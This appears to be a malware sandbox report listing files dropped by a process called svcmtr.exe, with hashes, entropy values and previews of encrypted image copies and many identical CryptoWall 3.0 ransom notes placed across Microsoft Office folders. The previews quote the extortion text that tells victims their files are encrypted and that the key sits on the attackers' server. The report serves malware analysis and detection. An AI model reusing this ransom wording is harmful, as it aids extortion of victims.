                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):10094
                                                                                                                          Entropy (8bit):7.977207486039188
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:GoIBQwADC5rmiqC/1eCRmcFHRcP/63rpfp8dWk/XhOBMbVZFLGFPWoy6Ta:GbBaCC1C/1+Q0635ig0GUCWPWa
                                                                                                                          MD5:5FFF05838B9F9A07F73DA39681857700
                                                                                                                          SHA1:3DC15E929918F9937C904AC49796392B5776ECD4
                                                                                                                          SHA-256:53939B17D2656A75AEEE16D950B15AF6AC4829213F74520642ED5EEB03BA11F1
                                                                                                                          SHA-512:CFCC2C61D8369913F2BDC6DDE483B372CB345615B39BB07BBAD285FF7A98A50941BFF4FB2DFF62969819F45231AE60D38577FB642D420229ADC25589CAD226DA
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..H7.....|.S :.8.%.....i.Eb...'.~?p..YnV..^......b$cw9._..?.....+9A,.>./....)X.E..k}p.8..KO.^...'(H.|!.m...s..B......6/.d....dF....Gul2rqr-k..j6'..*..3.J..b!..H..M...nz.h.....a....|-....x........M..J..gY....%(....C.wf...21B.Z..l.X....nR0......s..u..o.+%.J.......H.x.....w.f..,.q.l.P...c............,......Q/.oh"(.D...(<I..4>.$..S`"x+DGS...i..H.m.\R.A....o.......xG.....J.w......x:.,.#._D..I%a>RZ..!.7.y....ep.;(.R.a*|..-...."..%...B..,=I.#{.'..I.....%.....l .x.m....2....W#.o...O.9g.BL..<.b....Y|..o...E.~3....!.....G.....#H.u......i..o.....\..$.(..t.`:T..5..u.X..hI.2....

                                                                                                                          C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0302953.JPG.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):10094
                                                                                                                          Entropy (8bit):7.977207486039188
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:GoIBQwADC5rmiqC/1eCRmcFHRcP/63rpfp8dWk/XhOBMbVZFLGFPWoy6Ta:GbBaCC1C/1+Q0635ig0GUCWPWa
                                                                                                                          MD5:5FFF05838B9F9A07F73DA39681857700
                                                                                                                          SHA1:3DC15E929918F9937C904AC49796392B5776ECD4
                                                                                                                          SHA-256:53939B17D2656A75AEEE16D950B15AF6AC4829213F74520642ED5EEB03BA11F1
                                                                                                                          SHA-512:CFCC2C61D8369913F2BDC6DDE483B372CB345615B39BB07BBAD285FF7A98A50941BFF4FB2DFF62969819F45231AE60D38577FB642D420229ADC25589CAD226DA
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..H7.....|.S :.8.%.....i.Eb...'.~?p..YnV..^......b$cw9._..?.....+9A,.>./....)X.E..k}p.8..KO.^...'(H.|!.m...s..B......6/.d....dF....Gul2rqr-k..j6'..*..3.J..b!..H..M...nz.h.....a....|-....x........M..J..gY....%(....C.wf...21B.Z..l.X....nR0......s..u..o.+%.J.......H.x.....w.f..,.q.l.P...c............,......Q/.oh"(.D...(<I..4>.$..S`"x+DGS...i..H.m.\R.A....o.......xG.....J.w......x:.,.#._D..I%a>RZ..!.7.y....ep.;(.R.a*|..-...."..%...B..,=I.#{.'..I.....%.....l .x.m....2....W#.o...O.9g.BL..<.b....Y|..o...E.~3....!.....G.....#H.u......i..o.....\..$.(..t.`:T..5..u.X..hI.2....

                                                                                                                          C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0315447.JPG

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):25230
                                                                                                                          Entropy (8bit):7.991879872767614
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GvgxbFvJrAxq9pFDVC2dU8HXMaluZPfDlro6112BklYe+:JbFBcxq9pBVC2dU8HXH0NDlzT7/+
                                                                                                                          MD5:7B72D09A507D34B8577EFA66F8EAFC29
                                                                                                                          SHA1:4991891BF7AE2D9B86429A27A73A5C7F378BB4F7
                                                                                                                          SHA-256:ECD930FA094626FA273BF22C86A56A4831BC088FDEC316BDED55CB329EC1F3EA
                                                                                                                          SHA-512:CF239D9E8E685BA35A63E15EC946830FC801DF7B39DB679728FC5ECD95EE6F0E6571C45A85DE8D06E4C5D3221796789F4F4221A49D8DCF956283CB5446F38E4C
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...K..J.k.t<,... ..`....g.._......kc.r{..z.Y...N..J..(.....4D.....Z.(+.@..8o.l..FJhC....E........c..Gs....&}.K..*?Z|.....OlX..%.Pi...S....D.Zb...9..... C.....]..s.8....../...C.:.Y.b.....&...=........../Hc.%...s.....!......F.@.....j.$.5k/....[4.D.UJ.Oj.=P..|...S$.....j.5+j"0.. .X.s9.vK...3(....+.......h.....s.....Q..R...n:.T..eq[..k...\.h.m...B..3@4..~q....@.n....2L&.N......%.V~......"E..:..&...0..J3.....Q4....I%."[.u.}2V..6..5..q.}:....UMN..C..#F..L...{...*>..S...B6Wu..T....aZ.%.......:.v..E5..MHY..UX$...r.d\..m..`H...&....k.<..7U..a..../.g.L..R....g.q.Ne~U.{\.D."WB..Y""$.<.

                                                                                                                          C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0315447.JPG.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):25230
                                                                                                                          Entropy (8bit):7.991879872767614
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GvgxbFvJrAxq9pFDVC2dU8HXMaluZPfDlro6112BklYe+:JbFBcxq9pBVC2dU8HXH0NDlzT7/+
                                                                                                                          MD5:7B72D09A507D34B8577EFA66F8EAFC29
                                                                                                                          SHA1:4991891BF7AE2D9B86429A27A73A5C7F378BB4F7
                                                                                                                          SHA-256:ECD930FA094626FA273BF22C86A56A4831BC088FDEC316BDED55CB329EC1F3EA
                                                                                                                          SHA-512:CF239D9E8E685BA35A63E15EC946830FC801DF7B39DB679728FC5ECD95EE6F0E6571C45A85DE8D06E4C5D3221796789F4F4221A49D8DCF956283CB5446F38E4C
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...K..J.k.t<,... ..`....g.._......kc.r{..z.Y...N..J..(.....4D.....Z.(+.@..8o.l..FJhC....E........c..Gs....&}.K..*?Z|.....OlX..%.Pi...S....D.Zb...9..... C.....]..s.8....../...C.:.Y.b.....&...=........../Hc.%...s.....!......F.@.....j.$.5k/....[4.D.UJ.Oj.=P..|...S$.....j.5+j"0.. .X.s9.vK...3(....+.......h.....s.....Q..R...n:.T..eq[..k...\.h.m...B..3@4..~q....@.n....2L&.N......%.V~......"E..:..&...0..J3.....Q4....I%."[.u.}2V..6..5..q.}:....UMN..C..#F..L...{...*>..S...B6Wu..T....aZ.%.......:.v..E5..MHY..UX$...r.d\..m..`H...&....k.<..7U..a..../.g.L..R....g.q.Ne~U.{\.D."WB..Y""$.<.

                                                                                                                          C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\MEDIA\OFFICE14\1033\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\MEDIA\OFFICE14\1033\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\MEDIA\OFFICE14\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
